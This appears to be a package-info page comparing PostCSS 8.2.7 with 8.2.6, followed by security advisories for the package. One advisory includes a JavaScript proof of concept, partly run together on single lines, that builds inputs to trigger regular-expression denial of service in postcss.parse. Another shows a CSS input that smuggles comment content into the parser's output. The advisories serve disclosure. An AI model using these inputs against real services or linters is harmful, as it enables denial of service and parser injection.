PostCSS version 8.2.7 represents a minor update to the popular CSS transformation tool, building upon the existing functionality of version 8.2.6. Both versions maintain the core purpose of empowering developers to manipulate CSS with JavaScript plugins, enabling tasks like vendor prefixing, future CSS syntax adoption, and code optimization. They share the essential dependencies, including nanoid for generating unique IDs and source-map for debugging. Crucially, both are released under the permissive MIT license and actively supported by the community through Open Collective funding.
The primary difference between the two lies in the updated colorette dependency. PostCSS 8.2.6 utilizes colorette version 1.2.1 , while 8.2.7 upgrades this dependency to version 1.2.2. While seemingly small, this update likely incorporates bug fixes or minor feature enhancements within the colorette package, potentially impacting the appearance or behavior of colored terminal output related to PostCSS processes. Developers relying on terminal output for debugging or build processes may notice subtle changes. Furthermore, the unpacked size of the package has increased slightly in 8.2.7, potentially due to these dependency updates.
PostCSS, in general, is vital for modern web development workflows. Its plugin architecture makes it adaptable to a wide range of CSS-related tasks. Whether you need to automate repetitive tasks, stay ahead of CSS standards, or improve code quality, PostCSS provides a robust foundation that integrates readily into existing build systems using tools like webpack, parcel, and gulp. Regular updates, like this minor version bump, help to insure robustness and compatibility of existing developer workflows.
All the vulnerabilities related to the version 8.2.7 of the package
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.